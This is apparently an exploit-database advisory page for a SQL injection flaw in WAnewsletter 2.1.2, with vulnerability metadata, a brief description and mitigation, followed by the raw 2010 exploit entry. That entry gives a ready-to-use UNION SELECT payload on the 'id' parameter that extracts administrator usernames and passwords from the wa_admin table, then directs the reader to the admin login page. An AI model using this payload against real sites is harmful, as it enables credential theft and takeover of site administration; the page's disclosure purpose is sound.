WAnewsletter v 2.1.2 SQL Injection Vulnerability

vendor:

WAnewsletter

by:

BrOx-Dz

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: WAnewsletter

Affected Version From: 2.1.2

Affected Version To: 2.1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:phpcodeur.net:wanewsletter:2.1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2010

WAnewsletter v 2.1.2 SQL Injection Vulnerability

WAnewsletter v 2.1.2 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'id' in the URL. This can be used to extract sensitive information from the database such as user credentials.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

================================================
WAnewsletter v 2.1.2 SQL Injection Vulnerability
================================================

################################################################################################
# Exploit Title: WAnewsletter v 2.1.2 SQL Injection Vulnerabilitie
# Date: 23/09/2010
# Author: BrOx-Dz
# Author: E.dz@hotmail.fr
# Software Link:http://phpcodeur.net/wascripts/wanewsletter/releases/2.1.2/wanewsletter-2.1.2.zip
# Dork  : no Kids
# Version: 2.1.2
# Tested on: windows xp pack 3
################################################################################################
 
   
--[ Exploitable ]--

http://site/index.php?service=5&id=[SQL Injection]



http://site/index.php?service=5&id=4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--


and go

http://site/admin/login.php


--[ Demo ]--


http://site/index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--




Good Luck